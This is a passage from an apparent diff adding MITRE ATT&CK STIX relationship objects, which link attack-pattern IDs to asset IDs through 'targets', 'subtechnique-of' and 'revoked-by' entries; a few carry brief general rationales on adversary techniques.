"x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--217891bc-d325-403d-9acf-2aca83d433a0", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--21810a6f-d437-492e-b220-a20496de3b85", + "created": "2024-06-21T14:12:20.275Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.275Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--218a7c8e-77bf-4ee8-8bc1-0f7f5ff61ede", + "created": "2024-06-26T19:26:23.754Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T19:26:23.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--218c4556-40f6-421b-ad68-0bbe4d4e96ef", + "created": "2024-05-22T17:19:53.356Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T00:25:49.518Z", + "description": "Asset Mapping Rationale: Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications. Adversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext. ", + "relationship_type": "targets", + "source_ref": "attack-pattern--3a40f208-a9c1-4efa-a598-4003c3681fb8", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2192db77-8f8b-4fde-b893-86c8d26bfed0", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--21aa6331-3419-4049-b180-8349b71e1f2a", + "created": "2023-09-28T21:11:03.947Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:11:03.947Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--21befa31-e347-4f79-bfc8-fb7b0d4104b5", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--38eb0c22-6caf-46ce-8869-5964bd735858", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--21f9567c-18c5-41b2-9b57-bb2c039b5293", + "created": "2020-01-24T17:35:47.843Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--6c174520-beea-43d9-aac6-28fb77f3e446", + "target_ref": "attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--222249bc-7cee-4864-a66c-ef5e7e29d362", + "created": "2024-06-27T09:42:08.703Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:42:08.703Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--222f931d-4813-461a-bae3-d01361c66768", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2242f3f4-ca84-425f-af9a-146979cc756a", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6831414d-bb70-42b7-8030-d4e06b2660c9", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--224447b4-8a3a-4037-93fa-99099b7f5575", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--22502e6f-8365-49ea-bb94-f46a98f2643b", + "created": "2021-09-28T01:36:41.944Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--ffbcfdb0-de22-4106-9ed3-fc23c8a01407", + "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--22548926-29b4-4882-9878-633375489c0e", + "created": "2023-09-28T20:30:50.842Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:30:50.842Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--225a2500-b1ab-4a02-b6ff-255ba9713588", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--22653f82-bdac-463b-bdc0-ce971ad7b4df", + "created": "2024-05-23T03:50:59.428Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T00:27:53.779Z", + "description": "Asset Mapping Rationale: Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic.", + "relationship_type": "targets", + "source_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--22667d20-1db1-474d-8106-5ca6f336c520", + "created": "2024-06-26T15:34:48.234Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:34:48.234Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2289f005-7863-4af5-b681-cdfc03d3f111", + "created": "2023-09-29T18:56:08.414Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-05-28T00:29:53.724Z", + "description": "Asset Mapping Rationale: Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications.", + "relationship_type": "targets", + "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--229d9696-b5c0-47ae-9eee-0c7b277003a6", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--22aaf632-b70e-4514-b4a2-f8459d0909b3", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--22b2adf1-c534-49ef-9c5b-0ce4bebf4edd", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--824add00-99a1-4b15-9a2d-6c5683b7b497", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--22ba5443-ea49-4076-a666-722eb5352f70", + "created": "2023-09-28T20:02:45.697Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:02:45.697Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--22c5d62b-40cd-4dce-9b6d-7836b67ee7f5", + "created": "2020-01-24T15:06:36.002Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--62166220-e498-410f-a90a-19d4339d4e99", + "target_ref": "attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--22c7dc14-324e-4b84-82f5-76e7a42b8e5c", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--43c9bc06-715b-42db-972f-52d25c09a20c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--22d804d8-1e8d-4117-b819-bf682f86e6ba", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6831414d-bb70-42b7-8030-d4e06b2660c9", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--22dd54d0-4285-444a-9bbd-ce3b3bd81b67", + "created": "2020-09-30T17:09:31.964Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--40f5caa0-4cb7-4117-89fc-d421bb493df3", + "target_ref": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--22e606f5-4130-4de8-984b-cfabcf5fc21c", + "created": "2020-02-25T19:00:52.356Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--c1b11bf7-c68e-4fbf-a95b-28efbe7953bb", + "target_ref": "attack-pattern--4d2a5b3e-340d-4600-9123-309dd63c9bf8", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--22e8b7b4-7e5f-45a8-a935-c4cc7da638f2", + "created": "2020-02-11T18:29:47.836Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", + "target_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--22fd6ec5-1b2a-411d-85ae-63d625f0dfb2", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--232c7049-7609-46a9-8bbe-38672713f853", + "created": "2023-09-28T21:15:32.371Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:15:32.371Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--233329cc-44a1-4b2b-b5da-8dcfd5d79086", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--23412d3d-4c7f-49d7-9e20-3b1ca614baa6", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2346cbf5-b3c8-4110-a66c-6194251d4d49", + "created": "2023-09-29T16:43:53.940Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:43:53.940Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--23585114-516b-4b52-ab82-e773f1c4835f", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--23609305-92fc-4caf-b6e7-20664db9117f", + "created": "2024-06-26T13:41:05.652Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:41:05.652Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f005e783-57d4-4837-88ad-dbe7faee1c51", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--236511b4-1a35-4d88-a528-9d0eec12cad5", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--23851bda-49de-4f35-979f-c4e6b5742389", + "created": "2024-04-09T20:59:53.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-04-09T20:59:53.669Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--238d9a1f-ff64-4847-b5aa-7de999c9b6fb", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + 